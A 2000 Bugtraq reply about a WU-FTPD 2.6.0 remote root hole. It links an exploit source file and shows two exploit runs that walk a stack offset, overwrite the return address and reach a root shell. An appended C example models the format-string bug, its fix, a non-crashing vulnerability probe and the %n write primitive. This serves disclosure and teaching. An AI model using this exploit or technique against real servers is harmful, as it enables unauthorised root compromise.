Bugtraq: Re: WuFTPD: Providing *remote* root since at least 1994

From: Przemyslaw Frasunek <venglin_at_FREEBSD.LUBLIN.PL>
Date: Sat, 1 Jul 2000 17:12:35 +0200

> Has anyone come out with a working version of this exploit script. Both
> versions provided on the securityfocus.com web site, and/or the one
> distributed here by TF8, are not working, even after I fixed his code. Do
> we know for sure the thing even exists.. I dunno, can anyone direct me to
> the actual code, because I have yet to see a working version of it that
> doesn't CORE dump.

Sure? Both tf8's and mine (http://v.freebsd.lublin.pl/sources/bobek.c) work
on my RedHat and BSD boxes:

lubi:venglin:~> ./b -t 4 pedagog
Selected platform: RedHat Linux 6.2 with WUFTPD 2.6.0-RPM

Connected to pedagog. Trying to log in.
Logged in as ftp. Checking vulnerability.
Ok, trying to find offset (initial: 1024)
at offset 1024
at offset 1032
at offset 1040
at offset 1048
at offset 1056
at offset 1064
at offset 1072
at offset 1080
at offset 1088
at offset 1096
RET: 0x80759e0, RET location: 0xbfffcf74, RET location offset on stack: 1100
Reply size: 289, New RET: 0x80758bf
Wait 10-20 seconds for reply. Enjoy your shell.
[...]
0000000000000000000000000000000
Linux pedagog.xxx.xxx.xx 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown
/
uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)

Another example:

lubi:venglin:~> ./b localhost
Selected platform: FreeBSD 3.4-STABLE with WUFTPD 2.6.0-ports

Connected to localhost. Trying to log in.
Logged in as ftp. Checking vulnerability.
Ok, trying to find offset (initial: 1024)
at offset 1024
at offset 1032
at offset 1040
at offset 1048
at offset 1056
at offset 1064
at offset 1072
RET: 0x80b1f10, RET location: 0xbfbfcc04, RET location offset on stack: 1076
Reply size: 527, New RET: 0x80b1d01
Wait 10-20 seconds for reply. Enjoy your shell.
[...]
00000000000000000000000000000000000000000000000000000000000000
FreeBSD lubi.xxx.xxx.xx 3.4-STABLE FreeBSD 3.4-STABLE #1: Wed Mar 1 11:18:54
CET 2000 venglin_at_lubi.xxx.xxx.xx:/mnt/elite/usr/src/sys/compile/GADACZKA
i386
/
uid=0(root) gid=0(wheel) egid=5(operator) groups=5(operator)

--
* Fido: 2:480/124 ** WWW: http://www.freebsd.lublin.pl ** NIC-HDL: PMF9-RIPE *
* Inet: venglin_at_freebsd.lublin.pl ** PGP: D48684904685DF43  EA93AFA13BE170BF *
Received on Jul 02 2000
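Added example, not part of the original message, of bobek.c or of wu-ftpd. The two sessions above walk a stack offset upward until the saved return address is located ("RET location offset on stack"), then replace it ("New RET"); that is the standard shape of a format-string exploit, and the bug class is stated here as an assumption rather than something the post spells out. The C program below models the vulnerable reply pattern beside its fix, gives a probe that answers the "Checking vulnerability" step without dereferencing anything, and shows the %n write that a format-string exploit uses to steer a stored word. The reply() helper, the probe strings and every function name are constructed for the demo.

```c
/* Added example, not code from the original post, from bobek.c or from
 * wu-ftpd.  Assumption: the flaw behind the session logs above is a
 * format-string bug, i.e. text from the client reaching the format argument
 * of a printf-family call.  reply_vulnerable()/reply_fixed() model the two
 * patterns with a varargs reply helper of the kind FTP daemons typically use;
 * the probe strings are constructed for the demo. */
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define REPLY_MAX 256

/* Varargs helper: formats one reply line.  Harmless as long as every caller
 * passes a constant format string. */
static int reply(char *out, size_t outlen, const char *fmt, ...)
{
    va_list ap;
    int n;
    va_start(ap, fmt);
    n = vsnprintf(out, outlen, fmt, ap);
    va_end(ap);
    return n;
}

/* Vulnerable pattern: the client's text *is* the format.  Each directive in
 * it consumes the next word of the caller's stack; "%x" leaks that word and
 * "%n" writes through it.  Stepping the number of directives is how an exploit
 * walks the stack the way the offset search above does. */
int reply_vulnerable(char *out, size_t outlen, const char *user)
{
    return reply(out, outlen, user);          /* BUG: attacker controls the format */
}

/* Fixed pattern: constant format, client text passed only as data. */
int reply_fixed(char *out, size_t outlen, const char *user)
{
    return reply(out, outlen, "%s", user);
}

/* Expected echo of a probe after one pass of format interpretation, assuming
 * the probe contains no directive other than "%%" (which consumes nothing). */
static void collapse_percent(const char *probe, char *expect, size_t n)
{
    size_t j = 0;
    for (size_t i = 0; probe[i] != '\0' && j + 1 < n; i++) {
        if (probe[i] == '%' && probe[i + 1] == '%') {
            expect[j++] = '%';
            i++;                              /* skip the second '%' */
        } else {
            expect[j++] = probe[i];
        }
    }
    expect[j] = '\0';
}

/* Safe remote oracle for the "Checking vulnerability" step: send text that
 * contains "%%" and nothing else that looks like a directive.  A vulnerable
 * server echoes it with each "%%" collapsed to "%"; a fixed server echoes it
 * verbatim.  Nothing is dereferenced, so the check does not crash the daemon. */
int looks_vulnerable(const char *probe, const char *echo)
{
    char expect[REPLY_MAX];
    collapse_percent(probe, expect, sizeof expect);
    return strcmp(echo, expect) == 0 && strcmp(echo, probe) != 0;
}

/* Run a probe through a simulated server (fixed or not) and return the
 * oracle's verdict: 1 = text was interpreted as a format, 0 = echoed as data. */
int check_server(int server_is_fixed, const char *probe)
{
    char echo[REPLY_MAX];
    if (server_is_fixed)
        reply_fixed(echo, sizeof echo, probe);
    else
        reply_vulnerable(echo, sizeof echo, probe);
    return looks_vulnerable(probe, echo);
}

/* The write primitive: %n stores the count of characters emitted so far into
 * the int its argument points to, and a field width sets that count.  Here the
 * pointer is a legitimate argument; in reply_vulnerable() it would be whatever
 * word sits at the stack offset the exploit searched for. */
int demo_percent_n_write(int width)
{
    char scratch[REPLY_MAX];
    int written = -1;
    snprintf(scratch, sizeof scratch, "%*c%n", width, 'A', &written);
    return written;                           /* == width for 1 <= width < REPLY_MAX */
}

int main(void)
{
    const char *probe = "%%probe%%";          /* constructed probe */
    printf("vulnerable server: %d\n", check_server(0, probe));   /* 1 */
    printf("fixed server:      %d\n", check_server(1, probe));   /* 0 */
    printf("%%n wrote %d\n", demo_percent_n_write(100));         /* 100 */
    return 0;
}
```

The oracle deliberately sends only "%%": any other directive consumes a stack word and, on a vulnerable daemon, can fault before you have learned anything. Once the server is confirmed vulnerable, the offset search and the %n overwrite are the destructive steps, and they are what the session logs above show.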